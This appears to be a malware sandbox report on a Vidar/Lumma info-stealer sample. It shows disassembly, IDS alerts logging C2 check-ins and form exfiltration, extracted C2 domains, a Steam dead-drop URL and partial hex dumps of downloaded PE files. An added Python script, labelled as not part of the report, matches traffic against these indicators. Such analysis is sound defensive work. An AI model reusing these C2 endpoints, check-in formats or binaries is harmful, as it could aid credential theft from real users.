Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov word ptr [edx], ax 10_2_00D57B69
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h 10_2_00D5BB20
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then cmp byte ptr [ebx], 00000000h 10_2_00D43CBA
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esp] 10_2_00D75C62
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then jmp eax 10_2_00D55C1B
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 10_2_00D3DDC4
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then movzx edi, byte ptr [ecx+esi] 10_2_00D33D78
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov edi, ecx 10_2_00D41D02
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov ecx, dword ptr [edx] 10_2_00D2DED8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 10_2_00D43E69
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esi+30h] 10_2_00D5FFD5
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esp] 10_2_00D39FE8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esp] 10_2_00D39FE8
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then jmp ecx 10_2_00D35FB0
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then mov eax, dword ptr [esi+30h] 10_2_00D5FF74
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 4x nop then dec ebx 10_2_00D6BF08

Networking

Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49742 -> 95.164.90.97:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.164.90.97:80 -> 192.168.2.4:49742
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.164.90.97:80 -> 192.168.2.4:49742
Source: Network traffic Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:53642 -> 45.132.206.251:80
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:53641 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:53641 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:53640 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:53640 -> 188.114.96.3:443
Source: Malware configuration extractor URLs: isoplethui.sbs
Source: Malware configuration extractor URLs: frizzettei.sbs
Source: Malware configuration extractor URLs: laddyirekyi.sbs
Source: Malware configuration extractor URLs: invinjurhey.sbs
Source: Malware configuration extractor URLs: bemuzzeki.sbs
Source: Malware configuration extractor URLs: exilepolsiy.sbs
Source: Malware configuration extractor URLs: exemplarou.sbs
Source: Malware configuration extractor URLs: wickedneatr.sbs
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199780418869
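The extracted configuration above (the eight LummaC .sbs domains and the Vidar Steam profile URL), together with the decrypted strings "TeslaBrowser/5.5" and "lid=%s&j=%s&ver=4.0" from the AV Detection section, are enough for a host- or proxy-side check that catches the same traffic the Suricata rules flagged. The following is an added example, not part of the Joe Sandbox report or of the Emerging Threats rules it cites. The indicator strings are copied from the report; the pipe-separated log format, the sample lines and the rule that any single indicator flags a request are constructed for the example.

```python
"""Score HTTP requests against the LummaC / Vidar network indicators in this
report. Added example, not part of the sandbox output. Copied from the report:
the eight LummaC C2 domains, the Vidar config URL (a Steam profile used as a
dead-drop resolver), the decrypted User-Agent "TeslaBrowser/5.5" and the
check-in body format "lid=%s&j=%s&ver=4.0". Constructed for the example: the
log format, the sample lines, and the any-single-indicator rule."""
import re
from dataclasses import dataclass, field
from typing import List

LUMMA_C2_DOMAINS = {
    "isoplethui.sbs", "frizzettei.sbs", "laddyirekyi.sbs", "invinjurhey.sbs",
    "bemuzzeki.sbs", "exilepolsiy.sbs", "exemplarou.sbs", "wickedneatr.sbs",
}
LUMMA_USER_AGENT = "TeslaBrowser/5.5"
# "lid=%s&j=%s&ver=4.0" with the two %s placeholders turned into wildcards.
LUMMA_CHECKIN_BODY = re.compile(r"^lid=[^&]+&j=[^&]+&ver=4\.0$")
# Vidar's config names a profile page, not a C2 host: the real C2 address is
# read from that page, so only the exact host+path pair is an indicator.
VIDAR_DEAD_DROP = ("steamcommunity.com", "/profiles/76561199780418869")


@dataclass
class HttpRequest:
    method: str
    host: str
    path: str
    user_agent: str
    body: str = ""


@dataclass
class Verdict:
    families: List[str] = field(default_factory=list)
    reasons: List[str] = field(default_factory=list)


def parse_log_line(line: str) -> HttpRequest:
    """Constructed format: METHOD|host|path|user-agent|body (body may be empty)."""
    method, host, path, ua, body = line.rstrip("\n").split("|", 4)
    return HttpRequest(method, host.lower(), path, ua, body)


def host_in_config(host: str) -> bool:
    """Exact match or any subdomain of a configured C2 domain."""
    return host in LUMMA_C2_DOMAINS or any(host.endswith("." + d) for d in LUMMA_C2_DOMAINS)


def assess(req: HttpRequest) -> Verdict:
    v = Verdict()
    if host_in_config(req.host):
        v.reasons.append("host %s is in the LummaC C2 list" % req.host)
    if req.user_agent == LUMMA_USER_AGENT:
        v.reasons.append("User-Agent is the decrypted LummaC string TeslaBrowser/5.5")
    if req.method == "POST" and LUMMA_CHECKIN_BODY.match(req.body):
        v.reasons.append("POST body has the lid=/j=/ver=4.0 check-in shape")
    if v.reasons:
        v.families.append("LummaC")
    if (req.host, req.path) == VIDAR_DEAD_DROP:
        v.reasons.append("fetch of the Steam profile named in the Vidar config")
        v.families.append("Vidar")
    return v


def scan(lines):
    """Return (line, Verdict) for every line that triggered at least one indicator."""
    hits = []
    for line in lines:
        verdict = assess(parse_log_line(line))
        if verdict.families:
            hits.append((line, verdict))
    return hits


# Constructed sample traffic; none of these lines come from the report.
SAMPLE_LOG = [
    "POST|exemplarou.sbs|/api|TeslaBrowser/5.5|lid=0123abcd&j=xyz&ver=4.0",
    "GET|steamcommunity.com|/profiles/76561199780418869|Mozilla/5.0|",
    "GET|steamcommunity.com|/app/730|Mozilla/5.0|",
    "POST|updates.example.net|/check|TeslaBrowser/5.5|",
    "GET|cdn.exemplarou.sbs|/|Mozilla/5.0|",
]

if __name__ == "__main__":
    for line, verdict in scan(SAMPLE_LOG):
        print(verdict.families, verdict.reasons, line)
```

Two caveats the report makes visible. The Vidar "C2 url" is a Steam community profile, i.e. a dead-drop resolver: the stealer reads the real C2 address from that page, and the Vidar exchanges in the Suricata lines go to 95.164.90.97 and 45.132.206.251, neither of which is in the config, so matching the exact profile path rather than the steamcommunity.com host avoids blocking a legitimate site. The LummaC check-ins go to 188.114.96.3 over TLS 1.2, an address in Cloudflare's 188.114.96.0/20 range that is shared with unrelated sites, so the durable indicators are the domain names (in DNS, SNI or proxy logs), not the IP.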
Source: global traffic TCP traffic: 192.168.2.4:51630 -> 162.159.36.2:53
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:27 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 25 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 db 23 00 f1 36 00 00 9c a2 24 00 28 00 00 00 00 d0 24 00 cc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 24 00 88 e2 00 00 60 b2 23 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b1 23 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 47 d3 20 00 00 10 00 00 00 d4 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 91 22 03 00 00 f0 20 00 00 24 
03 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 7c 00 00 00 20 24 00 00 62 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b4 10 00 00 00 a0 24 00 00 12 00 00 00 5e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 c0 24 00 00 02 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 cc 12 00 00 00 d0 24 00 00 14 00 00 00 72 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 35 ff 00 00 00 f0 24 00 00 00 01 00 00 86 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:34 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 
6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:35 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 
72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:35 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 
72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:36 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 
00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:37 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 